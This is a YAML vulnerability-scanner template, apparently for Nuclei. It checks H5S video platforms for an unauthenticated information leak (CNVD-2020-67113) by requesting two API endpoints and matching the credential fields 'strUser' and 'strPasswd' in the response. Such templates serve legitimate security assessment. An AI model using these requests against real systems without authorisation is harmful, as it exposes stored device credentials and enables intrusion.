id: h5s-video-unauth

info:
  name: H5S GetUserInfo Information leakage
  author: str1am
  severity: high
  reference:
    - https://github.com/workcha/crossCompile/blob/e1ad2ecb6d4e083913aa52ae7c9ed0e93cf735c3/project/fscan/WebScan/pocs/h5s-video-platform-cnvd-2020-67113-unauth.yml
  tags: H5S,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/GetSrc"
      - "{{BaseURL}}/api/v1/GetDevice"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "strUser"
          - "strPasswd"
        part: body
        condition: and